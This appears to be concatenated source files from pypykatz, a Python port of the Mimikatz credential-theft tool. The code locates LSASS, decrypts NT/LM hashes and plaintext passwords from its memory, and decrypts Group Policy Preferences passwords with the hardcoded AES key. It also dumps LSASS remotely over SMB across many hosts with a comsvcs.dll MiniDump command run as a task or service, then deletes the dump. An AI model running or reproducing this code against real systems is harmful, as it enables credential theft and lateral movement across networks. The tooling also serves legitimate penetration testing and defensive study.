	process_basic_info = PROCESS_EXTENDED_BASIC_INFORMATION()
	process_basic_info.Size = sizeof(PROCESS_EXTENDED_BASIC_INFORMATION)
	_NtQueryInformationProcess = windll.ntdll.NtQueryInformationProcess
	if process_handle == None:
		process_handle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, False, pid)

	status = _NtQueryInformationProcess(process_handle,
									   ProcessBasicInformation,
									   byref(process_basic_info),
									   process_basic_info.Size,
									   None)
	if status < 0:
		raise ctypes.WinError()
	CloseHandle(process_handle)
	return process_basic_info


def get_protected_process_infos(pid,process_handle=None):
	process_protection_infos = None
	_NtQueryInformationProcess = windll.ntdll.NtQueryInformationProcess
	if process_handle == None:
		process_handle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, False, pid)
	if WINDOWS_BUILD_NUMBER >= WindowsMinBuild.WIN_8.value:
		protection_info = PS_PROTECTION()
		status = _NtQueryInformationProcess(process_handle,
										   ProcessProtectionInformation,
										   byref(protection_info),
										   sizeof(protection_info),
										   None)
		if status < 0:
			raise ctypes.WinError()
		if protection_info.Type > 0:
			process_protection_infos = {"level": protection_info.Level,
										"type": PS_PROTECTED_TYPE_STRINGS[protection_info.Type],
										"signer": PS_PROTECTED_SIGNER_STRINGS[protection_info.Signer],
										"audit": protection_info.Audit}
	else:
		_ps_extended_basic_information = get_process_extended_basic_information(pid,process_handle)
		if _ps_extended_basic_information.IsProtectedProcess:
			process_protection_infos = {"type": 'System protected process'}
	CloseHandle(process_handle)
	return process_protection_infos
	
def get_lsass_pid():
	return pid_for_name('lsass.exe')

def pid_for_name(process_name):
	pid_to_name = enum_process_names()
	for pid in pid_to_name:
		if pid_to_name[pid].lower().endswith(process_name):
			return pid
			
	raise Exception('Failed to find %s' % process_name)



#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#
import io
import json
import base64
from pypykatz.commons.common import WindowsBuild, WindowsMinBuild, KatzSystemArchitecture, GenericReader, UniversalEncoder, hexdump
from pypykatz.commons.filetime import filetime_to_dt
from pypykatz.lsadecryptor.packages.msv.templates import MSV1_0_PRIMARY_CREDENTIAL_STRANGE_DEC
from pypykatz.lsadecryptor.packages.credman.templates import KIWI_CREDMAN_LIST_STARTER, KIWI_CREDMAN_SET_LIST_ENTRY
from pypykatz.lsadecryptor.package_commons import PackageDecryptor

class MsvCredential:
	def __init__(self):
		self.credtype = 'msv'
		self.username = None
		self.domainname = None
		self.NThash = None
		self.LMHash = None
		self.SHAHash = None
		self.DPAPI = None
		self.isoProt = None
		
		
	def to_dict(self):
		t = {}
		t['username'] = self.username
		t['domainname'] = self.domainname
		t['NThash'] = self.NThash
		t['LMHash'] = self.LMHash
		t['SHAHash'] = self.SHAHash
		t['DPAPI'] = self.DPAPI
		return t
		
	def to_json(self):
		return json.dumps(self.to_dict(), cls=UniversalEncoder)
		
	def __str__(self):
		t = '\t== MSV ==\n'
		t += '\t\tUsername: %s\n' % (self.username if self.username else 'NA')
		t += '\t\tDomain: %s\n' % (self.domainname if self.domainname else 'NA')
		t += '\t\tLM: %s\n' % (self.LMHash.hex() if self.LMHash else 'NA')
		t += '\t\tNT: %s\n' % (self.NThash.hex() if self.NThash else 'NA')
		t += '\t\tSHA1: %s\n' % (self.SHAHash.hex() if self.SHAHash else 'NA')
		t += '\t\tDPAPI: %s\n' % (self.DPAPI.hex() if self.DPAPI else 'NA')
		return t
		
class CredmanCredential:
	def __init__(self):
		self.credtype = 'credman'
		self.luid = None
		self.username = None
		self.password = None
		self.password_raw = b''
		self.domainname = None

	def to_dict(self):
		t = {}
		t['credtype'] = self.credtype
		t['username'] = self.username
		t['domainname'] = self.domainname
		t['password'] = self.password
		t['password_raw'] = self.password_raw
		t['luid'] = self.luid
		return t
		
	def to_json(self):
		return json.dumps(self.to_dict())
		
	def __str__(self):
		t = '\t== CREDMAN [%x]==\n' % self.luid
		t += '\t\tluid %s\n' % self.luid
		t += '\t\tusername %s\n' % self.username
		t += '\t\tdomain %s\n' % self.domainname
		t += '\t\tpassword %s\n' % self.password
		t += '\t\tpassword (hex)%s\n' % self.password_raw.hex()
		return t
		
		
class LogonSession:
	grep_header = ['packagename', 'domain', 'user', 'NT', 'LM', 'SHA1', 'masterkey', 'sha1_masterkey', 'key_guid','plaintext']
	
	def __init__(self):
		self.authentication_id = None
		self.session_id = None
		self.username = None
		self.domainname = None
		self.logon_server = None
		self.logon_time = None
		self.sid = None
		self.luid = None
		
		self.msv_creds = []
		self.wdigest_creds = []
		self.ssp_creds = []
		self.livessp_creds = []
		self.dpapi_creds = []
		self.kerberos_creds = []
		self.credman_creds = []
		self.tspkg_creds = []
		self.cloudap_creds = []
	
	@staticmethod
	def parse(entry, reader):
		"""
		Converts KIWI_MSV1_0_LIST type objects into a unified class
		"""
		lsc = LogonSession()
		lsc.authentication_id = entry.LocallyUniqueIdentifier
		lsc.session_id = entry.Session
		lsc.username = entry.UserName.read_string(reader)
		lsc.domainname = entry.Domaine.read_string(reader)
		lsc.logon_server = entry.LogonServer.read_string(reader)
		if entry.LogonTime != 0:
			lsc.logon_time = filetime_to_dt(entry.LogonTime).isoformat()
		lsc.sid = str(entry.pSid.read(reader))
		lsc.luid = entry.LocallyUniqueIdentifier
		return lsc
		
	def to_dict(self):
		t = {}
		t['authentication_id'] = self.authentication_id
		t['session_id'] = self.session_id
		t['username'] = self.username
		t['domainname'] = self.domainname
		t['logon_server'] = self.logon_server
		t['logon_time'] = self.logon_time
		t['sid'] = self.sid
		t['luid'] = self.luid
		t['msv_creds']  = []
		t['wdigest_creds']  = []
		t['ssp_creds']  = []
		t['livessp_creds']  = []
		t['dpapi_creds']  = []
		t['kerberos_creds']  = []
		t['credman_creds']  = []
		t['tspkg_creds']  = []
		for cred in self.msv_creds:
			t['msv_creds'].append(cred.to_dict())
		for cred in self.wdigest_creds:
			t['wdigest_creds'].append(cred.to_dict())
		for cred in self.ssp_creds:
			t['ssp_creds'].append(cred.to_dict())
		for cred in self.livessp_creds:
			t['livessp_creds'].append(cred.to_dict())
		for cred in self.dpapi_creds:
			t['dpapi_creds'].append(cred.to_dict())
		for cred in self.kerberos_creds:
			t['kerberos_creds'].append(cred.to_dict())
		for cred in self.credman_creds:
			t['credman_creds'].append(cred.to_dict())
		for cred in self.tspkg_creds:
			t['tspkg_creds'].append(cred.to_dict())
		return t
		
	def to_json(self):
		return json.dumps(self.to_dict(), cls=UniversalEncoder)
	
	def __str__(self):
		t = '== LogonSession ==\n'
		t += 'authentication_id %s (%x)\n' % (self.authentication_id, self.authentication_id)
		t += 'session_id %s\n' % self.session_id
		t += 'username %s\n' % self.username
		t += 'domainname %s\n' % self.domainname
		t += 'logon_server %s\n' % self.logon_server
		t += 'logon_time %s\n' % self.logon_time
		t += 'sid %s\n' % self.sid
		t += 'luid %s\n' % self.luid
		if len(self.msv_creds) > 0:
			for cred in self.msv_creds:
				t+= '%s' % str(cred)
		if len(self.wdigest_creds) > 0:
			for cred in self.wdigest_creds:
				t+= str(cred)
		if len(self.ssp_creds) > 0:
			for cred in self.ssp_creds:
				t+= str(cred)
		if len(self.livessp_creds) > 0:
			for cred in self.livessp_creds:
				t+= str(cred)
		if len(self.kerberos_creds) > 0:
			for cred in self.kerberos_creds:
				t+= str(cred)
		if len(self.wdigest_creds) > 0:
			for cred in self.wdigest_creds:
				t+= str(cred)
		if len(self.credman_creds) > 0:
			for cred in self.credman_creds:
				t+= str(cred)
		if len(self.tspkg_creds) > 0:
			for cred in self.tspkg_creds:
				t+= str(cred)
		if len(self.dpapi_creds) > 0:
			for cred in self.dpapi_creds:
				t+= str(cred)
		return t

	def to_row(self):
		for cred in self.msv_creds:
			t = cred.to_dict()
			yield [self.luid, 'msv', self.session_id, self.sid, 'msv', '', self.domainname, self.username, 'NT', t['NThash'].hex() if t['NThash'] else '']
			yield [self.luid, 'msv', self.session_id, self.sid, 'msv', '', self.domainname, self.username, 'LM', t['LMHash'].hex() if t['LMHash'] else '']
			yield [self.luid, 'msv', self.session_id, self.sid, 'msv', '', self.domainname, self.username, 'sha1', t['SHAHash'].hex() if t['SHAHash'] else '']
		for cred in self.wdigest_creds:
			t = cred.to_dict()
			yield [self.luid, t['credtype'], self.session_id, self.sid, t['credtype'], '', self.domainname, self.username, 'plaintext', t['password']]
		for cred in self.ssp_creds:
			t = cred.to_dict()
			yield [self.luid, t['credtype'], self.session_id, self.sid, t['credtype'], '', self.domainname, self.username, 'plaintext', t['password']]
		for cred in self.livessp_creds:
			t = cred.to_dict()
			yield [self.luid, t['credtype'], self.session_id, self.sid, t['credtype'], '', self.domainname, self.username, 'plaintext', t['password']]
		for cred in self.dpapi_creds:
			t = cred.to_dict()
			yield [self.luid, t['credtype'], self.session_id, self.sid, t['credtype'], '', self.domainname, self.username, 'masterkey', t['masterkey']]
			yield [self.luid, t['credtype'], self.session_id, self.sid, t['credtype'], '', self.domainname, self.username, 'sha1', t['sha1_masterkey']]
		for cred in self.kerberos_creds:
			t = cred.to_dict()
			yield [self.luid, t['credtype'], self.session_id, self.sid, t['credtype'], '', self.domainname, self.username, 'plaintext', t['password']]
		for cred in self.credman_creds:
			t = cred.to_dict()
			yield [self.luid, t['credtype'], self.session_id, self.sid, t['credtype'], '', self.domainname, self.username, 'plaintext', t['password']]
		for cred in self.tspkg_creds:
			t = cred.to_dict()
			yield [self.luid, t['credtype'], self.session_id, self.sid, t['credtype'], '', self.domainname, self.username, 'plaintext', t['password']]

	def to_grep_rows(self):
		for cred in self.msv_creds:
			t = cred.to_dict()
			yield [
				'msv', 
				self.domainname, 
				self.username, 
				t['NThash'].hex() if t['NThash'] else '', 
				t['LMHash'].hex() if t['LMHash'] else '', 
				t['SHAHash'].hex() if t['SHAHash'] else '',
				'',
				'',
				'',
				''
			]
		
		for package in [self.wdigest_creds, self.ssp_creds, self.livessp_creds, self.credman_creds, self.tspkg_creds]:
			for cred in package:
				t = cred.to_dict()
				if t['password'] is not None:
					yield [str(t['credtype']), str(t['domainname']), str(t['username']), '', '', '', '', '', '', str(t['password'])]

		for cred in self.kerberos_creds:
			t = cred.to_dict()
			if t['password'] is not None or t['pin'] is not None:
				pin = ''
				if t['pin'] is not None:
					pin = '[PIN]%s' % t['pin']
					yield [str(t['credtype']), str(t['domainname']), str(t['username']), '', '', '', '', '', '', pin]
				if t['password'] is not None:
					yield [str(t['credtype']), str(t['domainname']), str(t['username']), '', '', '', '', '', '', str(t['password'])]
		
		for cred in self.dpapi_creds:
			t = cred.to_dict()
			yield [str(t['credtype']), '', '', '', '', '', str(t['masterkey']), str(t['sha1_masterkey']), str(t['key_guid']), '']
		
		for cred in self.cloudap_creds:
			t = cred.to_dict()
			#print(t)
			yield [str(t['credtype']), '', '', '', '', '', str(t['dpapi_key']), str(t['dpapi_key_sha1']), str(t['key_guid']), base64.b64encode(str(t['PRT']).encode()).decode()]



		
		
class MsvDecryptor(PackageDecryptor):
	def __init__(self, reader, decryptor_template, lsa_decryptor, credman_template, sysinfo):
		super().__init__('Msv', lsa_decryptor, sysinfo, reader)
		self.decryptor_template = decryptor_template
		self.credman_decryptor_template = credman_template
		self.entries = []
		self.entries_seen = {}
		self.logon_sessions = {}
		self.logon_session_count = None
		
		self.current_logonsession = None

	def find_first_entry(self):
		#finding signature
		#input('sig %s' % self.decryptor_template.signature.hex())
		#input('sig %s' % self.decryptor_template.first_entry_offset)
		position = self.find_signature('lsasrv.dll',self.decryptor_template.signature)

		#getting logon session count
		self.logon_session_count = 1
		if self.sysinfo.architecture == KatzSystemArchitecture.X64:
			if self.sysinfo.buildnumber >= WindowsBuild.WIN_8.value or (WindowsMinBuild.WIN_8.value <= self.sysinfo.buildnumber < WindowsMinBuild.WIN_BLUE.value and self.sysinfo.msv_dll_timestamp > 0x60000000):
				ptr_entry_loc = self.reader.get_ptr_with_offset(position + self.decryptor_template.offset2)
				self.reader.move(ptr_entry_loc)
				self.logon_session_count = int.from_bytes(self.reader.read(1), byteorder = 'big', signed = False)

		#getting logon session ptr
		ptr_entry_loc = self.reader.get_ptr_with_offset(position + self.decryptor_template.first_entry_offset)
		ptr_entry = self.reader.get_ptr(ptr_entry_loc)
		return ptr_entry, ptr_entry_loc

	
	def add_entry(self, entry):
		self.current_logonsession = LogonSession.parse(entry, self.reader)
		if entry.CredentialManager.value != 0:
			self.parse_credman_credentials(entry)
		
		if entry.Credentials_list_ptr.value != 0:			
			self.walk_list(entry.Credentials_list_ptr, self.add_credentials)
		else:
			self.log('No credentials in this structure!')
		
		self.logon_sessions[self.current_logonsession.luid] = self.current_logonsession
		
	def add_credentials(self, primary_credentials_list_entry):
		self.walk_list(
			primary_credentials_list_entry.PrimaryCredentials_ptr, 
			self.add_primary_credentials
		)
		
	def parse_credman_credentials(self, logon_session):
		self.log_ptr(logon_session.CredentialManager.value, 'KIWI_CREDMAN_SET_LIST_ENTRY')
		credman_set_list_entry = logon_session.CredentialManager.read(self.reader, override_finaltype = KIWI_CREDMAN_SET_LIST_ENTRY)
		self.log_ptr(credman_set_list_entry.list1.value, 'KIWI_CREDMAN_LIST_STARTER')
		list_starter = credman_set_list_entry.list1.read(self.reader, override_finaltype = KIWI_CREDMAN_LIST_STARTER)
		if list_starter.start.value != list_starter.start.location:
			self.walk_list(list_starter.start, self.add_credman_credential, override_ptr = self.credman_decryptor_template.list_entry)
		
	def add_credman_credential(self, credman_credential_entry):
		
		c = CredmanCredential()
		c.username = credman_credential_entry.user.read_string(self.reader)
		c.domainname = credman_credential_entry.server2.read_string(self.reader)
		
		if credman_credential_entry.cbEncPassword and credman_credential_entry.cbEncPassword != 0:
			enc_data = credman_credential_entry.encPassword.read_raw(self.reader, credman_credential_entry.cbEncPassword)
			if c.username.endswith('$') is True:
				c.password, c.password_raw = self.decrypt_password(enc_data, bytes_expected=True)
				if c.password is not None:
					c.password = c.password.hex()
			else:
				c.password, c.password_raw = self.decrypt_password(enc_data)
		
		c.luid = self.current_logonsession.luid
			
		self.current_logonsession.credman_creds.append(c)
		
	
	def add_primary_credentials(self, primary_credentials_entry):
		encrypted_credential_data = primary_credentials_entry.encrypted_credentials.read_data(self.reader)

		#this is super-strange but sometimes the encrypted data can be empty (seen in forensics images)
		if not encrypted_credential_data:
			return
		
		self.log('Encrypted credential data \n%s' % hexdump(encrypted_credential_data))
		self.log('Decrypting credential structure')
		dec_data, raw_dec = self.decrypt_password(encrypted_credential_data, bytes_expected = True)
		self.log('%s: \n%s' % (self.decryptor_template.decrypted_credential_struct.__name__, hexdump(dec_data)))

		struct_reader = GenericReader(dec_data, self.sysinfo.architecture)
		if len(dec_data) == MSV1_0_PRIMARY_CREDENTIAL_STRANGE_DEC.size and dec_data[4:8] == b'\xcc\xcc\xcc\xcc':
			creds_struct = MSV1_0_PRIMARY_CREDENTIAL_STRANGE_DEC(struct_reader)
		else:
			creds_struct = self.decryptor_template.decrypted_credential_struct(struct_reader)
		
		
		cred = MsvCredential()
		
		if creds_struct.UserName:
			try:
				cred.username = creds_struct.UserName.read_string(struct_reader)
			except Exception as e:
				self.log('Failed to get username, reason : %s' % str(e))
		if creds_struct.LogonDomainName:
			try:
				cred.domainname = creds_struct.LogonDomainName.read_string(struct_reader)
			except Exception as e:
				self.log('Failed to get domainname, reason : %s' % str(e))

		
		if hasattr(creds_struct, 'DPAPIProtected') and creds_struct.DPAPIProtected != b'\x00'*16:
			cred.DPAPI = creds_struct.DPAPIProtected
		
		if hasattr(creds_struct, 'isIso'):
			cred.isoProt = bool(creds_struct.isIso[0])
		#	
		#	if cred.isoProt is True:
		#		cred.NThash = None
		#		cred.LMHash = None
		#		cred.SHAHash = None
		#
		#else:
		#	cred.NThash = creds_struct.NtOwfPassword
		#	
		#	if creds_struct.LmOwfPassword and creds_struct.LmOwfPassword != b'\x00'*16:
		#		cred.LMHash = creds_struct.LmOwfPassword
		#	cred.SHAHash = creds_struct.ShaOwPassword

		cred.NThash = creds_struct.NtOwfPassword
			
		if creds_struct.LmOwfPassword and creds_struct.LmOwfPassword != b'\x00'*16:
			cred.LMHash = creds_struct.LmOwfPassword
		cred.SHAHash = creds_struct.ShaOwPassword
		
		self.current_logonsession.msv_creds.append(cred)
	
	def start(self):
		entry_ptr_value, entry_ptr_loc = self.find_first_entry()
		for i in range(self.logon_session_count):
			self.reader.move(entry_ptr_loc)
			for x in range(i*2): #skipping offset in an architecture-agnostic way
				self.reader.read_int() #does nothing just moves the position
				#self.log('moving to other logon session')

			entry_ptr = self.decryptor_template.list_entry(self.reader)
			
			if entry_ptr.location == entry_ptr.value:
				# when there are multiple logon sessions (modern windows) there are cases when the
				# logon session list doesnt exist anymore. worry not, there are multiple of them, 
				# but we need to skip the ones that are empty (eg. pointer points to itself)
				continue
			
			self.walk_list(entry_ptr, self.add_entry)

		#self.brute_test()
	
	#def brute_test(self):
	#	from pypykatz.commons.win_datatypes import LUID
	#	luid_int = 1138792
	#	luid_bytes = luid_int.to_bytes(8, byteorder='little', signed=False)
	#	needle_luid = LUID(io.BytesIO(luid_bytes)).value
	#	offset = 0x70
	#
	#	for luid_pos in self.reader.find_all_global(luid_bytes):
	#		self.reader.move(luid_pos - offset)
	#		et = self.decryptor_template.list_entry(self.reader).finaltype
	#		self.reader.move(luid_pos - offset)
	#		test_ptr = et(self.reader)
	#		if test_ptr.LocallyUniqueIdentifier == needle_luid:
	#			print('HIT!')
	#			entry_ptr = self.decryptor_template.list_entry(self.reader)
	#			try:
	#				self.walk_list(test_ptr.Flink, self.add_entry)
	#			except Exception as e:
	#				print('ERR! %s' % e)


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#


from pypykatz.commons.common import KatzSystemArchitecture, WindowsMinBuild, WindowsBuild
from pypykatz.alsadecryptor.win_datatypes import ULONG, LUID, KIWI_GENERIC_PRIMARY_CREDENTIAL, POINTER
from pypykatz.alsadecryptor.package_commons import PackageTemplate

class SspTemplate(PackageTemplate):
	def __init__(self):
		super().__init__('Ssp')
		self.signature = None
		self.first_entry_offset = None
		self.list_entry = None
	
	@staticmethod
	def get_template(sysinfo):
		template = SspTemplate()
		template.list_entry = PKIWI_SSP_CREDENTIAL_LIST_ENTRY
		template.log_template('list_entry', template.list_entry)
		
		if sysinfo.architecture == KatzSystemArchitecture.X64:
			if sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:
				template.signature = b'\xc7\x43\x24\x43\x72\x64\x41\xff\x15'
				template.first_entry_offset = 16
				
			elif WindowsMinBuild.WIN_VISTA.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1507.value:
				template.signature = b'\xc7\x47\x24\x43\x72\x64\x41\x48\x89\x47\x78\xff\x15'
				template.first_entry_offset = 20
				
			elif sysinfo.buildnumber >= WindowsBuild.WIN_10_1507.value:
				template.signature = b'\x24\x43\x72\x64\x41\xff\x15'
				template.first_entry_offset = 14
			
			else:
				#currently this doesnt make sense, but keeping it here for future use
				raise Exception('Could not identify template! Architecture: %s sysinfo.buildnumber: %s' % (sysinfo.architecture, sysinfo.buildnumber))
			
		
		elif sysinfo.architecture == KatzSystemArchitecture.X86:
			template.signature = b'\x1c\x43\x72\x64\x41\xff\x15'
			template.first_entry_offset = 12
			
		else:
			raise Exception('Unknown architecture! %s' % sysinfo.architecture)

			
		return template
	

class PKIWI_SSP_CREDENTIAL_LIST_ENTRY(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_SSP_CREDENTIAL_LIST_ENTRY()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_SSP_CREDENTIAL_LIST_ENTRY
		return p
		
class KIWI_SSP_CREDENTIAL_LIST_ENTRY:
	def __init__(self):
		self.Flink = None
		self.Blink = None
		self.References = None
		self.CredentialReferences = None
		self.LogonId = None
		self.unk0 = None
		self.unk1 = None
		self.unk2 = None
		self.credentials = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_SSP_CREDENTIAL_LIST_ENTRY()
		res.Flink = await PKIWI_SSP_CREDENTIAL_LIST_ENTRY.load(reader)
		res.Blink = await PKIWI_SSP_CREDENTIAL_LIST_ENTRY.load(reader)
		res.References = await ULONG.loadvalue(reader)
		res.CredentialReferences = await ULONG.loadvalue(reader)
		res.LogonId = await LUID.loadvalue(reader)
		res.unk0 = await ULONG.loadvalue(reader)
		res.unk1 = await ULONG.loadvalue(reader)
		res.unk2 = await ULONG.loadvalue(reader)
		await reader.align()
		res.credentials = await KIWI_GENERIC_PRIMARY_CREDENTIAL.load(reader)
		return res



import base64
from unicrypto.symmetric import AES, MODE_CBC
from unicrypto.backends.pure.padding.pkcs7 import unpad as pkcs7_unpad


def gppassword(pw_enc_b64):
	AES_KEY = b'\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b'
	AES_IV = b'\x00'*16
		
	pad = len(pw_enc_b64) % 4
	if pad == 1:
		pw_enc_b64 = pw_enc_b64[:-1]
	elif pad == 2 or pad == 3:
		pw_enc_b64 += '=' * (4 - pad)
		
	pw_enc = base64.b64decode(pw_enc_b64)
	
	ctx = AES(AES_KEY, MODE_CBC, IV = AES_IV)
	pw_dec  = pkcs7_unpad(ctx.decrypt(pw_enc))
	
	return pw_dec.decode('utf-16-le')
	


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#


from pypykatz.commons.common import KatzSystemArchitecture, WindowsMinBuild
from pypykatz.alsadecryptor.lsa_template_nt5 import LsaTemplate_NT5
from pypykatz.alsadecryptor.lsa_template_nt6 import LsaTemplate_NT6

class LsaTemplate:
	def __init__(self):
		pass


	@staticmethod
	def get_template_brute(sysinfo):
		if sysinfo.architecture == KatzSystemArchitecture.X86:
			if sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:
				return LsaTemplate_NT5.get_template_brute(sysinfo)
			else:
				return LsaTemplate_NT6.get_template_brute(sysinfo)

		elif sysinfo.architecture == KatzSystemArchitecture.X64:
			if sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:
				return LsaTemplate_NT5.get_template_brute(sysinfo)
			else:
				return LsaTemplate_NT6.get_template_brute(sysinfo)

	
	@staticmethod
	def get_template(sysinfo):		
		if sysinfo.architecture == KatzSystemArchitecture.X86:
			if sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:
				return LsaTemplate_NT5.get_template(sysinfo)
			else:
				return LsaTemplate_NT6.get_template(sysinfo)

		elif sysinfo.architecture == KatzSystemArchitecture.X64:
			if sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:
				return LsaTemplate_NT5.get_template(sysinfo)
			else:
				return LsaTemplate_NT6.get_template(sysinfo)


import asyncio
import os
import itertools

from aiosmb.examples.smbshareenum import SMBFileEnum, ListTargetGen, FileTargetGen

def natatime(n, iterable, fillvalue = None):
	"""Returns an iterator yielding `n` elements at a time.
	:param n: the number of elements to return at each iteration
	:param iterable: the iterable over which to iterate
	:param fillvalue: the value to use for missing elements
	:Example:
	>>> for (a,b,c) in natatime(3, [1,2,3,4,5], fillvalue = "?"):
		...   print a, b, c
		...
	1 2 3
	4 5 ?
	"""
	stepped_slices = ( itertools.islice(iterable, i, None, n) for i in range(n) )
	return itertools.zip_longest(*stepped_slices, fillvalue = fillvalue)


from pypykatz import logger

async def lsassfile(url, packages = ['all'], chunksize = 64*1024):
	from aiosmb.commons.connection.factory import SMBConnectionFactory
	from pypykatz.alsadecryptor.asbmfile import SMBFileReader
	from pypykatz.apypykatz import apypykatz

	smburl = SMBConnectionFactory.from_url(url)
	connection = smburl.get_connection()
	smbfile = smburl.get_file()

	async with connection:
		logger.debug('[LSASSFILE] Connecting to server...')
		_, err = await connection.login()
		if err is not None:
			raise err
		
		logger.debug('[LSASSFILE] Connected!')
		logger.debug('[LSASSFILE] Opening LSASS dump file...')
		_, err = await smbfile.open(connection)
		if err is not None:
			raise err
		
		logger.debug('[LSASSFILE] LSASS file opened!')
		logger.debug('[LSASSFILE] parsing LSASS file...')
		mimi = await apypykatz.parse_minidump_external(SMBFileReader(smbfile), chunksize=chunksize, packages = packages)
		logger.debug('[LSASSFILE] LSASS file parsed OK!')
		return mimi

async def lsassdump(url, method = 'task', remote_base_path = 'C:\\Windows\\Temp\\', remote_share_name = '\\c$\\Windows\\Temp\\',chunksize = 64*1024, packages = ['all'], targets = [], worker_cnt = 5):	
	from aiosmb.commons.connection.factory import SMBConnectionFactory
	base_url = None
	base_conn = None
	mimis = []
	workers = []

	tgens = []
	if targets is not None and len(targets) != 0:
		notfile = []
		if targets is not None:
			for target in targets:
				try:
					f = open(target, 'r')
					f.close()
					tgens.append(FileTargetGen(target))
				except:
					notfile.append(target)
			
			if len(notfile) > 0:
				tgens.append(ListTargetGen(notfile))

	if isinstance(url, SMBConnectionFactory):
		base_url = url
		base_conn = url.get_connection()
	else:
		base_url = SMBConnectionFactory.from_url(url)
		base_conn = base_url.get_connection()
	
	lsassdump_coro = lsassdump_single(
		base_conn.target.get_hostname_or_ip(), 
		base_conn, 
		method = method, 
		remote_base_path = remote_base_path, 
		remote_share_name = remote_share_name, 
		chunksize = chunksize, 
		packages = packages
	)
	workers.append(lsassdump_coro)

	for tgen in tgens:
		async for _, target, err in tgen.generate():
			tconn = base_url.create_connection_newtarget(target)
			lsassdump_coro = lsassdump_single(
				tconn.target.get_hostname_or_ip(), 
				tconn, 
				method = method, 
				remote_base_path = remote_base_path, 
				remote_share_name = remote_share_name, 
				chunksize = chunksize, 
				packages = packages
			)
			workers.append(lsassdump_coro)
			if len(workers) >= worker_cnt:
				tres = await asyncio.gather(*workers)
				for res in tres:
					yield res
				workers = []

	if len(workers) > 0:
		tres = await asyncio.gather(*workers)
		for res in tres:
			yield res
		workers = []


async def lsassdump_single(targetid, connection, method = 'task', remote_base_path = 'C:\\Windows\\Temp\\', remote_share_name = '\\c$\\Windows\\Temp\\',chunksize = 64*1024, packages = ['all']):
	try:
		from aiosmb.commons.exceptions import SMBException
		from aiosmb.wintypes.ntstatus import NTStatus
		from aiosmb.commons.interfaces.machine import SMBMachine
		from pypykatz.alsadecryptor.asbmfile import SMBFileReader
		from aiosmb.commons.interfaces.file import SMBFile
		from pypykatz.apypykatz import apypykatz

		if remote_base_path.endswith('\\') is False:
			remote_base_path += '\\'

		if remote_share_name.endswith('\\') is False:
			remote_share_name += '\\'

		fname = '%s.%s' % (os.urandom(5).hex(), os.urandom(3).hex())
		filepath = remote_base_path + fname
		filesharepath = remote_share_name + fname
		
		if method == 'task':
			cmd = """for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump ^%B {} full""".format(filepath)
			commands = [cmd]
		
		elif method == 'service':
			cmd = ''
		
		else:
			raise Exception('Unknown execution method %s' % method)

		mimi = None
		async with connection:
			logger.debug('[LSASSDUMP][%s] Connecting to server...' % targetid)
			_, err = await connection.login()
			if err is not None:
				raise err
			logger.debug('[LSASSDUMP][%s] Connected!' % targetid)
			async with SMBMachine(connection) as machine:
				if method == 'task':
					logger.debug('[LSASSDUMP][%s] Start dumping LSASS with taskexec method!' % targetid)
					smbfile_inner, err = await machine.task_dump_lsass()
					
					if err is not None:
						raise err
					
					smbfile = SMBFileReader(smbfile_inner)
					
					#logger.debug('[LSASSDUMP][%s] Start dumping LSASS with taskexec method!' % targetid)
					#logger.info('[LSASSDUMP][%s] File location: %s' % (targetid,filepath))
					#_, err = await machine.tasks_execute_commands(commands)
					#if err is not None:
					#	raise err
					#
					#logger.debug('[LSASSDUMP][%s] Opening LSASS dump file...' % targetid)
					#for _ in range(5):
					#	logger.debug('[LSASSDUMP][%s] Sleeping a bit to let the remote host finish dumping' % targetid)
					#	await asyncio.sleep(5)
					#	smbfile = SMBFileReader(SMBFile.from_remotepath(connection, filesharepath))
					#	_, err = await smbfile.open(connection)
					#	if err is not None:
					#		if isinstance(err, SMBException):
					#			if err.ntstatus == NTStatus.SHARING_VIOLATION:
					#				logger.debug('[LSASSDUMP][%s] LSASS dump is not yet ready, retrying...' % targetid)
					#				#await asyncio.sleep(1)
					#				continue
					#		raise err
					#	break
					#else:
					#	raise err
				
				
				
				elif method == 'service':
					logger.debug('[LSASSDUMP][%s] Start dumping LSASS with serviceexec method!' % targetid)
					smbfile_inner, err = await machine.service_dump_lsass()
					
					if err is not None:
						raise err
					smbfile = SMBFileReader(smbfile_inner)

				else:
					raise Exception('Unknown execution method %s' % method)
			
			logger.debug('[LSASSDUMP][%s] LSASS dump file opened!' % targetid)
			logger.debug('[LSASSDUMP][%s] parsing LSASS dump file on the remote host...' % targetid)
			mimi = await apypykatz.parse_minidump_external(smbfile, chunksize=chunksize, packages = packages)

			logger.debug('[LSASSDUMP][%s] parsing OK!' % targetid)
			logger.debug('[LSASSDUMP][%s] Deleting remote dump file...' % targetid)
			_, err = await smbfile.delete()
			if err is not None:
				print('[%s] Failed to delete LSASS file! Reason: %s' % (targetid, err))
			else:
				print('[%s] Remote LSASS file deleted OK!' % targetid)
	
		return targetid, mimi, None
	except Exception as e:
		import traceback
		traceback.print_exc()
		return targetid, None, e


#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#  zpycompletion
#
#  Copyright 2015 Spencer McIntyre <zeroSteiner@gmail.com>
#
#  Redistribution and use in source and binary forms, with or without
#  modification, are permitted provided that the following conditions are
#  met:
#
#  * Redistributions of source code must retain the above copyright
#    notice, this list of conditions and the following disclaimer.
#  * Redistributions in binary form must reproduce the above
#    copyright notice, this list of conditions and the following disclaimer
#    in the documentation and/or other materials provided with the
#    distribution.
